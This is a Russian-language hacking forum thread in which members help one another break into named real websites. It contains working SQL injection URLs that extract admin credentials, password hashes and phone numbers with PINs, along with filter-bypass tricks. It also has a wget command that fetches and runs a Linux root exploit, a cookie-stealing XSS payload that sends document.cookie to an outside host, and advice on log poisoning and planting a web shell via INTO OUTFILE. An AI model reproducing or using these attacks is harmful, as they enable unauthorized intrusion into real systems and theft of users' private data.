сенкс кстати не даш ссылочку на описаение иньекций подобного рода ?

Сцуко, поискать трудно самому да?
http://forum.antichat.ru/threadnav30501-1-10.html

честно лень спасибо огромное :)

Хочу спросить совета, и помощи в раскрутке скули, если она конечно присутствует на данном сайте: _http://lokomotiv.yar.ru

Захожу по адресу - _http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140

При подстановке кавычки - новость со страницы пропадает, ошибки никакой не пишет, если переменную пишу id=2142-1 , то выдаёт страницу как при id=2141 то есть вроде бы скуль есть.
Вставляю конструкцию order by и думаю, что получаю 11 столбцов, так как при таком запросе

_http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140%20order%20by%2011

страница выводится без ошибок, а вот при таком

_http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140%20order%20by%2012

инфа со страницы пропадает (конкретно новость).
Попытался продолжить с union select , и ничего не вышло, номера столбцов не выходят.
Может кто подскажет, что не так делаю? Или может вообще глупость творю и никакой уязвимости там нет?
Заранее всем откликнувшимся мерси.

Хочу спросить совета, и помощи в раскрутке скули, если она конечно присутствует на данном сайте: _http://lokomotiv.yar.ru

Захожу по адресу - _http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140

При подстановке кавычки - новость со страницы пропадает, ошибки никакой не пишет, если переменную пишу id=2142-1 , то выдаёт страницу как при id=2141 то есть вроде бы скуль есть.
Вставляю конструкцию order by и думаю, что получаю 11 столбцов, так как при таком запросе

_http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140%20order%20by%2011

страница выводится без ошибок, а вот при таком

_http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140%20order%20by%2012

инфа со страницы пропадает (конкретно новость).
Попытался продолжить с union select , и ничего не вышло, номера столбцов не выходят.
Может кто подскажет, что не так делаю? Или может вообще глупость творю и никакой уязвимости там нет?
Заранее всем откликнувшимся мерси.

Там нет ошибки.
Ты не правильно проводишь скул, нужно в конце закрывать запрос, либо /* либо --

Это слепая инъекция

http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140+and+1=1
http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140+and+1=0

MSSQL

Это слепая инъекция
MSSQL
Мерси, в догонку тогда вопрос, стандартные методы раскрутки такой инъекции есть? Или наугад "как ночью по тайге"?

Привет всем из далекой Литвы . Тут есть один сайт типа "друзья моих друзэй и.т.д" http://www.one.lt который что то трудновато взломать тут. Мне очень надо вернуть свой пасс . ник sfinxs15 . Ето сайт по моему полностью с куками управляется но что то тут никакой брутус непашет . Прошу помоши у всех кто как то смог бы его взломать :) если чe pishite . http://www.one.lt

sfinxs, если хочешь чтобы помогли, то не ври!
Там есть восстановление пароля

Вопрос опять по SQL =)
Вот есть SQL Инекция
http://www.petrovacnamoru.net/petrovac/kafe-barovi/?id=0x3127%20union+select+1,2,3,4/*
Ну например ввожу я там version() и вместо того чтобы показать версию он мне в ответ вот что:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Что это означает?)

2 CaNNabi$
нужно обойти фильтрацию держи:
_http://www.petrovacnamoru.net/petrovac/kafe-barovi/?id=0x3127%20union+select+1,aes_decrypt(aes_encryp t(version(),0x71),0x71),3,4/*

jokester, лол, это по твойму филтьрация?
Что за люди, если не знаешь нахуя писать всякую еботу?

2 Spyder
Извиняюсь за неточность обход ошибок кодировки
Функции AES_ENCRYPT() и AES_DECRYPT()- позволяют шифровать/дешифровать данные
Сначала шифруем с заданным ключом потом расшифровываем.Результат выводится уже в правильной кодировке. так лучше?

нашел один сай sql... из mysql.user version() - 4.1.20
достал логины и шеши
bla:*7E031FB695D422377447A5660A3B95FED283B260
bla:*7CDBD368F59FA498366CBEC09B7A5C2BAF06D045
потом пошли
bla:3bb4472d333b8afa
......
потом снова такого вида
bla:*7E031FB695D422355967A5660A3B95FED283B260
что это все значит

jokester нет. нахрена шифровать/дешифровать, если можно юзать нужную кодировку convert(version()+using+latin1)

вообще можно представить вывод функции в бинарном виде с помощьюфункции cast()
так намного проще
cast(version()+as+binary)

У меня такой вопрос,возможно ли провести sql инъекцию в сайтах бла.jino-net.ru, или нет? Спрашиваю потому что нираз не удавалось,в чем там загвоздка?

да, конечно возможно

да, конечно возможно
есть рабочий пример? Дай глянуть

есть рабочий пример? Дай глянуть
там все обычно. на каждом сайте выделяется одна бд под нужды юзера. соответственно, если на сайте есть уязвимые скрипты, можно провести инъекцию в эту бд.

Я понял,но хня заключается в том что кроме версии,юзера и бд,нифига не выходит,хотя версия муси 5 information_schema не пашет,мож там фильтрация стоит какая, как на хостинге спайсвеб на from?

fobofob, подбирай таблицы вручную

Я понял,но хня заключается в том что кроме версии,юзера и бд,нифига не выходит,хотя версия муси 5 information_schema не пашет,мож там фильтрация стоит какая, как на хостинге спайсвеб на from?
Конечно не пашет! там не вильтрация, а ограничение прав. Те ж сказали, что даётся 1 БД на сайт. Значит всё просто, только столбцы нужно подобрать. А чтобы узнать имя БД - зарегай се аккаунт и посмотри. Вобщем проанализируй там всё.

а фильтрации часто можно обходить так. Например, если слово from, то FrOm frFROMom. Но на джино нет фильтрации

P.S. В разделе XSS я выладивал как активную, так и пассиивную.

и еще вопросик, что это за кодировка паролей :
art:=Ы#џlu/њ$ )
volov:FШ
bazin:VШЦб(¦
rozonova:NЕоА
gaponov:VМВ/юШ
malvina:з[^
anna:eЛдIн >(· ? что это не хеши я знаю,так как на другом сайте с этим движком пароли в открытом виде

а может быть это просто кодировка дргуая?! Попробуй открыть ИнтернетЭксплорером и кодировку сменить на "автовыбор" или ещё чё...

нашел один сай sql... из mysql.user version() - 4.1.20
достал логины и шеши
bla:*7E031FB695D422377447A5660A3B95FED283B260
bla:*7CDBD368F59FA498366CBEC09B7A5C2BAF06D045
потом пошли
bla:3bb4472d333b8afa
......
потом снова такого вида
bla:*7E031FB695D422355967A5660A3B95FED283B260
что это все значит

Это логин и хэш) если я не ошибаюсь =)
bla:*7E031FB695D422377447A5660A3B95FED283B260
Это я не знаю че за шифровка)

А это
bla:3bb4472d333b8afa
Хэш MySQL =)
Вот ТУТ (http://forum.antichat.ru/thread26983.html) FAQ по хэшам ;)

bla:*7E031FB695D422377447A5660A3B95FED283B260
Это я не знаю че за шифровка)
Это печально... Если мне не изменяет память это хеш пятого мускула

Такой вопрос
Есть уязвимость, точнее есть ошибка в скрипте
при воде левых данных выводит
Invalid path for MapPath 'Skins/Default/Modules\../../../..].ascx'. A virtual path is expected.
тоесть в конце пути скрипт добавляет расширение ascx
пробовал добавить %00
непомогло
Подскажите плиз что делать

попробуй param=http://site.com/shell.txt?

попробуй добавить ?
и плюс попробуй "инклудить" файлы, что звщищены .htaccess

http://dls.ksu.kherson.ua/Dls/default.aspx?module=../../../../

А почему все пользуются для поиска уязвимостей только гуглом
че больше ни какие другие поисковики не принимают дополнительніх параметров
Ну к примеру Yahoo
я поьзуюсь только им
в нем лучний результат

А почему все пользуются для поиска уязвимостей только гуглом
че больше ни какие другие поисковики не принимают дополнительніх параметров
Ну к примеру Yahoo
я поьзуюсь только им
в нем лучний результат
Яхо по гугловской базе берет, работает (индексирует) сайты, у гугля много фукций чем у яхы, командные запросы больше... Еще есть search.icq.com но они тоже совместно с гуглем...

Добрый вечер у меня вопрос по мускуль, нашел скуль и подобрал таблицу, немного погодя нашлись и колонки. Но когда делаю запрос
www.site.ru/index.php?id=-1 union select 1,2,3,login,4,5,password,7 from admin/*

То запрос то выполняется, а вот в ответе на страницы нечего нету ( ... С чем это может быть связанно? И можно ли это как то исправить?

Только учусь!
Нашел скуль вида:
http://site.com/index.php?loc=tourism&type=article&read_id=-2+union+select+1,2,3,4,5,6/*

4.1.22-standard-log:site_name@localhost:site_name_db

Но при попытке подбирать таблицы выплевует:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

объясните пожалуйста, натолкните на варианты решения. Хотелось бы самому справиться но не получается. Всем, кто откликнется-СПАСИБО!!!

Но при попытке подбирать таблицы выплевует:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Значит не той таблицы который вы вставляете в запрос... Пробуйте до тех пор пока не найдете правильную таблицу

~Taxa~ таблица может быть пустая.

samarin - вы просто не правильно подбирали таблицы, вот ваш сайт
_http://arhar.dn.ua/index.php?loc=tourism&read_id=-12+union+select+1,2,passwd,4,5,6+from+smf_members/*&start=0

Piflit я знаю видел что там зареганно 10к усеров, и еще не только таблица admin но также и другие. Мне не верится что все таблицы пустые (

KPOT_f!nd - Хотелось конечно самому разобраться, но Спасибо! Если не затруднит объясните откуда взяли именно это название таблицы(т.к я подбирал несколько часов и ни на что толковое не наткнулся), а вы за несколько минут...

Скиньте мне свой номер осику в ПМ я вам стукну и все объясню...

2 ~Taxa~
если цифры из запроса выводятся то попробуй
aes_decrypt(aes_encrypt(login,0x71),0x71)
ну а чтобы Piflit не ругал меня можешь привести к char ;)

Хотелось конечно самому разобраться, но Спасибо! Если не затруднит объясните откуда взяли именно это название таблицы(т.к я подбирал несколько часов и ни на что толковое не наткнулся), а вы за несколько минут
smf_members - это стандартное название таблицы с префиксом по-умолчанию у форумов на движке simple machines.

_http://someshit.net/as3f13asf21/ - стандартные таблицы движков, и поля к ним.

Piflit я знаю видел что там зареганно 10к усеров, и еще не только таблица admin но также и другие. Мне не верится что все таблицы пустые (
таблица admin может быть пустая, а реальные админы быть в таблице realXadmin. так иногда делают)

ну ладно на админов забъем... А что насчет таблицы users ...
jokester спасибо щас попробуем...

jokester
короче сделал так:
www.site.ru/index.php?id=-1,2,char(105, 109),4,5+from+users/*
то мне выводит IM хотя я сам защифровал это слово в char
AES_DECRYPT не помогает ( что можно еще сделать*?

~Taxa~, скинь ссылку сюда или мне в пм (если стесняешься:d), а то я чуствую тебе щас тут насоветуют.

2 ~Taxa~
Slip прав без ссылки трудно советовать если отправишь ему отпишите что было,а то я переживаю

Народ подскажите плиз что даёт к примеру это -http://www4.army.mil/otf/story.php?id=-56/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*


4.1.22-log
otf_web_user@localhost
otf

интересует зачем пишут вот это -
4.1.22-log
otf_web_user@localhost
otf
и как это можно использавать ?
Спасибо !

интересует зачем пишут вот это -
4.1.22-log
otf_web_user@localhost
otf
и как это можно использавать ?
1. Версия. Если >5 , то хэк упрощается системной информацией о структуре бд.
2. Пользователь. От какого пользователя в данный момент работает бд. Так же помогает вытягивать информацию из mysq.user с помощью "where".
3. Название БД (насколько я понял своим телепатизмом). Опять же если ветка >5, упрощает взлом. Так же используется с "where".

подскажите пожалуйста!
Нашел скулю
http://www.poetryclub.com.ua/getpoem.php?id=55117+order+by+5/*
но при попытке подбора количества полей выплевывает
------------------------
Database error: Invalid SQL: UPDATE `users_poems` SET visited2 = visited2 + 1 WHERE id = 55117 order by 5/* AND confirmed=1
MySQL Error: 1054 (Unknown column '5' in 'order clause')
Session halted.
-----------------------
пробовал уже и union select(дошел до 30)и order by везде одно и тоже :(
Подскажите что я делаю не так. заренее Спасибо

2 samarin
Не все так просто почитай это:
_http://forum.antichat.ru/threadnav35207-1-10.html

Люди а вы неподскажите, где можна найти статью где описывается где вообще в апаче лежат всякие конфиги, например к phpMyAdmin, webmail, squirrelmail и тд. ?

Апач конфиг в папке :
\usr\local\Apache\conf файл httpd.conf

phpMyadmin:
\home\localhost\admin\mysql\phpmyadmin\
config.inc.php

mysql:
\usr\local\mysql5\my.ini

xaker-boss сдесь ещё парочка :)
_http://forum.antichat.ru/printthread.php?t=49775

Это логин и хэш) если я не ошибаюсь =)

Это я не знаю че за шифровка)

А это

Хэш MySQL =)
Вот ТУТ (http://forum.antichat.ru/thread26983.html) FAQ по хэшам ;)

то что первые хеши мускула 5 а следующие 4 я догадывался, но как они могут находиться в одной базе?

да легко, просто используются разные функции для хеширования
а точнее password() и old_password()

Добрый вечер!
нашел скулю вида:
-----------------------
http://art.dn.ua/news_one.php?news_id=1+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26/*
-----------------------
citysite
4.0.16
csuser@localhost.localdomain
------------------------
но никак не могу подобрать названия таблиц. Кому не трудно подскажите. Всем откликнувшимся СПАСИБО!

а мот там 1 таблица...

да легко, просто используются разные функции для хеширования
а точнее password() и old_password()

Как я понимаю версия должна быть 5. А у меня 4.

да нет, это просто названия типов mysql и mysql5... mysql5 хеши поддерживаются начиная с mysql 4.1 если хочешь работать со старыми хешами (mysql) то мускульный демон надо запускать с параметром --old-passwords, при этом mysql5 хеши как понимаешь никуда не деваются, а остаются в mysql.user

http://fifa08.in/?site=1'
http://fifa08.in/index.php?site=1'
http://fifa08.in/printview.php?board=3&topic=1'
http://fifa08.in/index.php?site=gallery&picID=1'
http://fifa08.in/index.php?site=forum_topic&topic=1'&page=1&sort=&type=DESC

POST'om
POST /comments.php HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

name=1&mail=1&url=1&captcha=1&captcha_hash='&referer=1&parentID=1&type=1&ip=1&savevisitorcomment=1


POST /index.php?site=register HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

nickname=1&username=1&pwd1=1&pwd2=1&mail=1&captcha=1&captcha_hash='&save=1

Скажите как вытянуть отсюда что-нибудь!!!!???

http://fifa08.in/?site=1'
http://fifa08.in/index.php?site=1'
http://fifa08.in/printview.php?board=3&topic=1'
http://fifa08.in/index.php?site=gallery&picID=1'
http://fifa08.in/index.php?site=forum_topic&topic=1'&page=1&sort=&type=DESC

POST'om
POST /comments.php HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

name=1&mail=1&url=1&captcha=1&captcha_hash='&referer=1&parentID=1&type=1&ip=1&savevisitorcomment=1


POST /index.php?site=register HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

nickname=1&username=1&pwd1=1&pwd2=1&mail=1&captcha=1&captcha_hash='&save=1

Скажите как вытянуть отсюда что-нибудь!!!!???

чет непашет твой сайтец
или у меня чет невыходит

Только учусь!
------------------------------
нашел скулю
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
-------------------------------
5.0.37-log
life
life@localhost
-------------------------------
http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/from/**/forums_auth/**/limit/**/1,1/*
-------------------------------
есть интересные таблицы: (но я их не перебирал)
board_admin_comment
f1
f1_bodies
f2
f2_bodies
f3
f3_bodies
f4
f4_bodies
f5
f5_bodies
forums
forums_auth
forums_forum2group
forums_groups
forums_moderators
forums_user2group
gal_user
guide
mail_archieve
maillist
maillist_users
poll_poll
poll_vote
prob
---------------------
сколько ни пробовал не получается делать запросы ттипа:
from+information_schema.columns+where+teble_name=' user'(в этом случае 'forums_auth')+limit,1,1/*
приходится перебирать ручками :(
ПОДСКАЖИТЕ может что не так делаю?

samarin у тебя ошибка с слове "teble_name",но думаю ты не об этом ,что значит не получается?

samarin у тебя ошибка с слове "teble_name",но думаю ты не об этом ,что значит не получается?
за ошибку я знаю-опечаска :)
да вот когда пытаюсь сделать этот запрос-выдает ошибку-и это не первый сайт
приведи пример например на этом сайте

за ошибку я знаю-опечаска :)
да вот когда пытаюсь сделать этот запрос-выдает ошибку-и это не первый сайт
приведи пример например на этом сайте
захекси user
from+information_schema.columns+where+table_name=0 x75736572 (в твоем случае 0x666F72756D735F61757468)
ошибка из-за экранирования кавычек

Scipio
На этом сайте не катит,"char" тоже,лично я первый раз такое вижу,кто объяснит?

ага понял... там блин = фильтруется надо like пользовать
http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,column_name,6,7,8,9,10/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'forums_auth'/**/limit/**/1,1/*

samarin
Это часный случай хитрых хохлов,а вообще переводи либо в Hex либо в char вот ссылка
_http://snak3.h17.ru/tools/
Scipio спасибо

ага понял... там блин = фильтруется надо like пользовать
Спасибо-Сам бы не разобрался

и еще вопросик, что это за кодировка паролей :
art:=Ы#џlu/њ$ )
volov:FШ
bazin:VШЦб(¦
rozonova:NЕоА
gaponov:VМВ/юШ
malvina:з[^
anna:eЛдIн >(· ? что это не хеши я знаю,так как на другом сайте с этим движком пароли в открытом виде


очень похоже на бинарный мд5

string md5 (string str [, bool raw_output])

если дать второй параметр, то получится что-то типа твоего

очень похоже на бинарный мд5

string md5 (string str [, bool raw_output])

если дать второй параметр, то получится что-то типа твоего
Не похоже. Бинарный md5 всегда содержит одинаковое количество символов, равное шестнадцати. А тут, как видишь, оно все время разное.

Возможно, это функция MySql ENCODE или AES_ENCRYPT

Все кто может просветите вот в таком вопросе. Есть сайт
http://www.rusk.ru/search.php?action=news
Если в форму "поиск" ввести какую-нибудь ерунду, а на в конце поставить "кавычку", то вылетает ошибка:
SQL ERROR..... N1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sdfd'') > 0))GROUP BY article.idar ORDER BY article.insdate DESC' at line 1
Интересует в обще-то следующее. Это на самом деле SQL? Можно ли из этого что-то "выжать"? А самое главное каков будет рабочий запрос? Ну то есть что надо ввести в поле формы или в УРЛ адрес, чтобы пробить инфу о базе и т.д? Правильно ли я понял, что запрос должен быть не совсем стандартный с использованием скобок? (в тексте описания ошибки они вроде как присутствуют, а где-то читал, что скобки должны быть закрыты в запросе).
Спасибо за возможный ответ.

введи в поиске:
sd')>0)) union select 1,2,3,4,5--
незабудь пробел после --

Ух, спасибо, всегда приятно общаться с умным человеком, а то я уж всю голову сломал куда и чего вписать. Оно ж получается, что вся инфа-то в описании ошибки была, тока надо правильно ей пользоваться.
Ещё раз мерси.

Вчера уже обсуждалась тема по поводу information_schema.columns
cегодня та же проблема, только у меня не получилось ни чар ни лайк, может что-то неправильно делал-объясните пожалуйста!
---------------------------------------------------------
http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,concat_ws(0x3a,version(),user( ),database()),3/*

5.0.32-Debian_7etch1-log:firstline_base@77.221.130.10:firstline_base

TRIGGERS
2103_forum_auth_access
2103_forum_banlist
2103_forum_categories
2103_forum_config
2103_forum_confirm
2103_forum_disallow
2103_forum_forum_prune
2103_forum_forums
2103_forum_groups
2103_forum_posts
2103_forum_privmsgs
2103_forum_privmsgs_text
2103_forum_ranks
2103_forum_sessions_keys
2103_forum_user_group

2103_forum_users

не впревый раз натыкаюсь на такое
http://louisianaforward.com/view-release.aspx?id=3502'
собственно подскажите что енто такое и можно ли его использовать ? :)

samarin
на этом сайте всё работает
_http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,column_name,3+from+information _schema.columns+where+table_name=0x323130335f666f7 2756d5f63617465676f72696573+limit+1,1/*

не впревый раз натыкаюсь на такое
http://louisianaforward.com/view-release.aspx?id=3502'
собственно подскажите что енто такое и можно ли его использовать ? :)
это ошибка скрипта а не БД, ипользовать можно, как раскрытие путей

2Scipio спасиб

Добрый ночи хотел узнать у спецов в области Unix-Like можно ли в данной ОС
Linux 2.6.9-1.667 поднять права? Реально ли вообще?

~Taxa~

wget http://packetstormsecurity.org/0607-exploits/prctl.sh.txt

mv prctl.sh.txt prctl.sh

bash prctl.sh

KPOT_f!nd не помогает :( если ли еще способы???

http://milw0rm.com/exploits/2013
http://milw0rm.com/exploits/4756


если не сработает, тогда только искать тебе пассы и тыкатся на рута.

Нашел пассивную xss, запрос такого вида:
http://site.ru/index.php?s=w&name=&level_min=%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D% 20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67 %2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%73%2 E%6E%65%74%73%65%63%2E%72%75%2F%64%6F%6F%6D%35%35% 2E%67%69%66%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63 %6F%6F%6B%69%65%3B%20%64%6F%63%75%6D%65%6E%74%2E%6 C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28% 27%68%74%74%70%3A%2F%2F%64%6F%6F%6D%35%35%2E%66%72 %65%65%68%6F%73%74%69%61%2E%63%6F%6D%2F%27%29%3C%2 F%73%63%72%69%70%74%3E&level_max=&subclass2=any&dmg_max=

или тоже самое, что и:

http://site.ru/index.php?s=w&name=&level_min=<script>img = new Image(); img.src = "http://s.netsec.ru/123.gif?"+document.cookie; document.location.replace('http://site2.ru/')</script>&level_max=&subclass2=any&dmg_max=

Почему куки не приходят через Opera? Через IE все отлично! На других не тэстил.

Захожу на сайт скачать одну из нескольких лекций, а там ошибка.
т.е. ссылки я вижу, а в описании файла вот такая фигня.
--------------------------------------------------------
Warning: filesize() [function.filesize]: stat failed for /home/www/lyric/pathology.dn.ua/html/lecturies/anomalii.immunnogo.otveta.ukr.doc in /home/www/pathology.dn.ua/html/viewpage.php(26) : eval()'d code on line 56
--------------------------------------------------------
насколько я понимаю файл на сервере превышает максимально допустимый размер
или неправильно написанный скрипт по подсчету размера файла
--------------------------------------------------------
если просто пытаюсь найти уязвимый скрипт выбрасывает на главную сраницу.

можно ли это как-то использовать кроме выяснения полных путей?

просто он файла не нашел такого и все, недумаю, что ты сможешь использовать отсутствие файла

samarin, eval()'d code on line 56 - тоесть там используется eval() попробуй в разные переменные по подставлять PHP код а вдруг чёнить получится...

Вопрос... Возможно ли провести инъекцию в mysql 3 ? Где-то видел статьи на тему, но не нашел. ps инъекция после where

Все, уже нашел, что невозможно :( Жаль...

можно выбирать только из той же таблицы, в которой присутствует иньекция.. или если file_priv есть то можно читать файлы

https://forum.antichat.ru/showpost.php?p=565034&postcount=4

Вопрос... Возможно ли провести инъекцию в mysql 3 ? Где-то видел статьи на тему, но не нашел. ps инъекция после where
полезного особо не вынешь, можно конечно, смотря из какой таблицы выборка идет, например если это таблица аккаунтов пользователя, то можно и пароли поиметь, но это редко случается, также при очень удачном раскладе и шелл можно залить с помощью into outfile например выборка идет из той таблицы, куда ты можешь добавлять что-то, например комментарии, при наличии файл прив ну и всех факторов для залития через into outfile шелл бдует залит

Macro
"SQL инъекция в MySQL сервере третей версии"
_http://www.securitylab.ru/contest/212101.php

У меня вопрос по SQL ... Нашел скуль, но вывод ответа от SQL сервера на страницу всего выводит по 1 строчке. Я сразу заюзал limit пример

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+lim it+1,1/*

выводит все гуд. Потом делаю так

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+lim it+2,1/*

гуд потом

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+lim it+100,1/*

писит что ошибка... Потом я пробую так

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+lim it+1,100/*

То мне вывождит на страницу 100 номеров + пины к ним... Знаю что юзеров 12к

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+lim it+12000,1/*

Так пашет гуд... соответственно и должно примерно быть около 8-9к номеров мобил...

Суть вопрос в том почему когда я вывожу юзеров то лимит пашет как обычно

12000,1/*

а когда вывожу номер мобил то

1,9000/*

select count(mobile_num) from mobile_users

также при очень удачном раскладе и шелл можно залить с помощью into outfile
Тааак юзверь на счастье оказался root
Будем пробовать шелл :) Спасибо, честно говоря, не подумал об этом.
Как ни странно, есть все необходимое, и файл прив и добавлять вроде как можно. :)

Вопрос опять по SQL.
Имеется вот такой адрес:
_http://fhplus.ru/gostevaya/index.php?page=1
Если ставлю кавычку после 1, то ошибки никакой не выводит, а вот если 1 убрать и поставить кавычку (вот так :
_http://fhplus.ru/gostevaya/index.php?page='
то выводит ошибку вида -
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 1
То есть как мне кажется инъекция есть, но вот составить правильный запрос опять не могу, поскольку нахожусь в процессе обучения и не всё ещё ясно до конца просьба помочь в правильном составлении запроса всем кто может конечно и главное хочет.
Как мне кажется опять ответ есть в сообщении о ошибке, а именно '-20, 20', но как это пристроить в запрос...?
Заранее спасибо и благодарности всем кто подскажет.

Климент_Ворошилов
20,-20 это колво допустимых строниц если брать значение больше 22 то выводит пустую 20,-20 сдесь не имеет отношение к скулю
попробуй подобрать кол во таблиц
http://fhplus.ru/gostevaya/index.php?page='+union+select+1,2,3,....стока цифр пока не исчезнет ошибка..../*
дальше меняй значение ?page='+union+select+user(),2,3,....стока цифр пока не исчезнет ошибка..../*
выведет юзера в бд
?page='+union+select+database(),2,3,....стока цифр пока не исчезнет ошибка..../*
имя бд
и тд
прочитай фак там всё написано...

ничего не получится . т.к. там явно идут некие математические действия с тем что в переменную передается)

Доброе утро всем
Ребята подскажите че можна вытащить через багу в скрипте
ну типа ../etc/passwd
доступна корневая директория, но я все файлы просматриваю только через браузер
пасы не нашел
короче обьясните ламеру блин
возможностей то дафига
откраты почти все директории
плиз
заранее спасибо

p.s.
через браузер вижу записи типа:
a%identdÉk`%htpasswd’Æ´b%cvsupd͉`%  pkg_fetchBΚ`%pkg_globÇBÎç`%pkg_sortÇBÎ*a% pkgdbÎOa%portcvsweb΂a%portscleanγa%po rtsdb»a% portupgradeÈb% portversiongd%ftpds]Êud%gss-serverÌwd% k5srvutilfÌxd%kadminÊ?d% kadmin.local~¡À…d%kadmind¹d% kdb5_utilf̺d%klogind»d%
я выделил название файлов
это директ /usr/local/sbin/ к примеру
Только это в сокращеном виде

ИМХО - ковырять исходники скриптов в поисках пути получения нормального шелла. Через просмотр файлов редко что-то можно поиметь. Можно поискать бэкапы, там иногда попадаются пароли.

bad_script.php?patch=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
нет не то?

1. Там инклуд или просто читалка файлов?
2. Если инклуд, тогда гадишь в логах апача (что то типа <?include($_GET["blabla"]);?>) и инклудишь их. Например в UA (юзер агент=\) передаешь ето дело
3. Если читалка файлов, то ищешь конфиги к сайту/форуму/чату, смотря что там у тебя стоит.

Да, там просто читалка

будем искать конфиги

подскажите пожлста уязвим ли первый параметр?
http://events.umn.edu/event?occurrence=408233;event=120318

http://events.umn.edu/event?occurrence=408234-1 - кажись уязвим...сейчас покопаю

И вот тут заоббно помогите
http://www.logobook.ru/prod_show.php?object_uid=11048116'

Подскажите LOAD_FILE('/etc/passwd')
так и указывать? /etc/passwd? или надо полный путь найти если да то как?

Вообще то /etc/passwd и есть полный путь=\

путь относительно корня (прлный). Если тебе нужно прочитать скрипт, то ищи раскрытие путей через выведенные ошибки или подбором (на практике, никогда не получалось)

Хотел узнать есть шелл на нем я нашел файлик .htpasswd открыл его там имеет запись виде:
sysun:H6I2zWbdQB7FU
pisty:34S0knJ4Gb362
Я так понял это акки, но для чего??? И в каком виде зашифрованы пароли???

посмотри рядом лежащие htaccess'ы, в них разгадка. пассы в DES'e

+toxa+ огромное спасибо ты был прав в файле htacces был урл =). Теперь нужно рассшифровать пассы)

passwordspro тебе в помощь)

Вот обьясните мне, ну вот нашел я уязвимость в скрипте вот
http://www.build.kz/index.php?page=inc/cut&sector=comp&action=sublist&cid=-1+union+select+concat(user(),char(58),version(),ch ar(58),database()),2+/*

А как мне имена таблиц то и столбцов подобрать??? версия скулы то 4 чем пользоваться? или есть базы? поделитесь пжлст)))

Вот тут список дефолтовских таблиц и полей:
http://forum.antichat.ru/showpost.php?p=465677&postcount=3
подбирай

2 truelamer
Ручками, то есть - ручной брутфорс, а вообще - там есть табла users - тебе осталось только колонки подобрать

Спасибо
вот что я нашел
http://www.build.kz/index.php?page=inc/cut&sector=comp&action=sublist&cid=-1+union+select+concat(users_name,char(58),users_pa ssword),2+from+users%20limit+0,1/*
только проблема обьясните там что хэш пароля не до конца вылез или как? и почему то лимитом листать не получается что только один пользователь?

Там один пользователь, это MySQL хэш, расшифровывается как admin

Спасибо!!!!! блин жаль я тебе hgenfwbb мало первый раз добавил)))
А что меня не хотит пускать под
login: Administrator
pass:admin
что такое?

Да и срузу же паралельно вопросик чем расшифровать MySQL хэш

Есть sql инъекция, столкнулся с такой проблемой: функцией count() через sql запрос показывает, что в таблице 30789 записей, когда даю запрос "limit+50,1" запрос выполняется и выводит 50-ую строку, но когда вбиваю "limit+100,1" то данные не выводятся. Плюс ко всему запрос работает и так "limit+1,5000" и выдаёт мне 5000 строк из таблицы, а когда запрашиваю "limit+1,9000" то не выводит ничего, просто пустую (белую) страницу выдаёт. В чём суть проблемы и возможно ли вывести все ~30к?

покажи на примере. вообще не выводятся? есть ли возможность что те значения пустые? то что не выводит 9к записей - скорее всего просто или у пхп память кончается (memory limit exceed) ну или чтониб подобное с нехваткой ресурсов, что тебе мешает сделать несколько запросов

limit+1,5000
limit+5000,10000
limit+10000,15000

и тд )

limit+1+offset+номер по порядку
пробовал ?
ИМХО- скорее всего из-за ограниченных прав

И такой вопрос, имею запрос вида
-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws(0x3a,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 ,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 9,50,51+from+INFORMATION_SCHEMA.COLUMNS+limit+1250/*
как его можна изменить чтобы выводить не по одной строчке а вывести все сразу, limit+100,1 и limit+100,1
